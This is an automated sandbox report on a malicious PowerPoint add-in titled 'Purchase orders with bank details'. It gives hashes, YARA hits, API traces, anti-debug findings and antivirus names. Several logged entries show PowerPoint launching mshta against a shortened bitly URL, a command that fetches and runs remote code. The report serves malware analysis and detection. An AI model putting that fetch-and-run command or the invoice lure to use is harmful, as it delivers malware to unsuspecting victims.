Summary | ZeroBOX

Purchase orders with bank details.ppa

Tags: VBA_macro, Generic Malware, MSOffice File, AntiDebug, AntiVM
Category: FILE
Machine: s1_win7_x6403_us
Started: Oct. 19, 2021, 5:10 p.m.
Completed: Oct. 19, 2021, 5:13 p.m.
Size 62.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: PowerPoint Presentation, Author: xxcdv, Last Saved By: junaid, Revision Number: 1, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 01:05, Create Time/Date: Mon Oct 18 02:57:03 2021, Last Saved Time/Date: Mon Oct 18 02:58:09 2021, Number of Words: 0
MD5 87b2f6337fbea5ee3f10eb1b210dd795
SHA256 8811a7bfc8b36649308ae32e37c3cfcd0e1bf700f34988bb9c7028a7d367d894
CRC32 AAC6B276
ssdeep 192:EKX63qOaEfhODL4k5yx2eyViSgXruCv8pT+GLFaMMQZxN4Z7LlVQw/Sf:K6gf8DL4SwpXrLv85+GRhMQvN4xJ/Sf
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • Generic_Malware_Zero - Generic Malware
  • Microsoft_Office_File_Zero - Microsoft Office File

DNS lookups (Name, Response, Post-Analysis Lookup):
  • www.bitly.com: CNAME bitly.com, 67.199.248.14
IP addresses (IP Address, Status, Action):
  • 164.124.101.2: Active, Moloch
  • 67.199.248.15: Active, Moloch

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

status: 1  return: 1  repeated: 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a96e000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d55000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d55000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x35180000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x35180000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75187000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75181000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x35180000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75179000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x35180000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75180000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0
cmdline "mshta" https://www.bitly.com/ajdwwrufqwehjwijjd
cmdline "C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwrufqwehjwijjd
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0
  • rule DebuggerCheck__GlobalFlags: (no description)
  • rule DebuggerCheck__QueryInfo: (no description)
  • rule DebuggerHiding__Thread: (no description)
  • rule DebuggerHiding__Active: (no description)
  • rule ThreadControl__Context: (no description)
  • rule SEH__vectored: (no description)
  • rule anti_dbg: Checks if being debugged
  • rule disable_dep: Bypass DEP
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002c4
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
status: 1  return: 0  repeated: 0
Lionic Trojan.Script.Generic.a!c
Symantec CL.Downloader!gen87
ESET-NOD32 VBA/TrojanDownloader.Agent.WVA
TrendMicro-HouseCall TROJ_FRS.VSNTJI21
Kaspersky HEUR:Trojan-Downloader.Script.Generic
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
McAfee-GW-Edition Artemis!Trojan
Ikarus Trojan.VBA.Agent
McAfee RDN/GenericU
Tencent Mac.Trojan.Macrov.Eckg
parent_process powerpnt.exe martian_process "mshta" https://www.bitly.com/ajdwwrufqwehjwijjd
parent_process powerpnt.exe martian_process "C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwrufqwehjwijjd
Process injection: Process 1608 resumed a thread in remote process 2620
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000055c
suspend_count: 1
process_identifier: 2620
status: 1  return: 0  repeated: 0
file C:\Windows\System32\mshta.exe